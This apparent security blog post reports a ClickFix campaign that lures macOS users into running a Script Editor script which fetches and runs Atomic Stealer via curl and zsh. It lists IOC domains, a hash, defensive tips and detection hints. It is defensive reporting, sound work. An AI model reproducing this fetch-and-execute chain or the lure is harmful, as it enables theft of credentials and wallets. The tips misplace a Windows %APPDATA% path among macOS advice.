Researchers at Jamf Threat Labs have uncovered a new ClickFix campaign targeting macOS users, marking a significant shift in attacker tactics. Instead of relying on Terminal commands, this variant leverages Script Editor to bypass Apple’s latest protections and deliver the Atomic Stealer infostealer.
How the Attack Works
- Fake Apple-themed webpage: Disguised as a disk cleanup utility, complete with step-by-step instructions mimicking legitimate macOS maintenance.
- Browser trick: Clicking “Execute” triggers the applescript URL scheme, prompting the browser to open Script Editor.
- Deceptive script: Script Editor displays a pre-populated script with fake Apple copyright headers, making it appear authentic.
- Execution chain:
- Obfuscated command unscrambles into a malicious URL.
curl -kfetches payloads without TLS validation.- Content is piped into
zshand executed in memory. - A Mach-O binary (
helper) is dropped in/tmp, stripped of attributes, and executed.
- Payload: A recent Atomic Stealer variant that harvests browser credentials, saved passwords, crypto wallets, and sensitive data.
Indicators of Compromise
- Domains:
dryvecar.com,storage-fixes.squarespace.com,cleanupmac.mssg.me. - Binary hash:
3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44.
Defensive Guidance
- Do not run scripts prompted by external webpages, even if branded with Apple logos.
- Decline browser requests to open Script Editor or automation tools from unknown sources.
- Keep macOS updated to ensure the latest built-in protections are active.
- Monitor for suspicious activity: Processes launched from
%APPDATA%, obfuscatedcurlcalls, or binaries dropped in/tmp.
Final Thought
This campaign highlights how quickly attackers adapt to new defenses. Apple’s Terminal protections forced adversaries to pivot, and Script Editor became the new execution point. For macOS users, vigilance against social engineering is just as critical as technical safeguards — attackers exploit trust and routine system tasks to slip past defenses.
Leave a Reply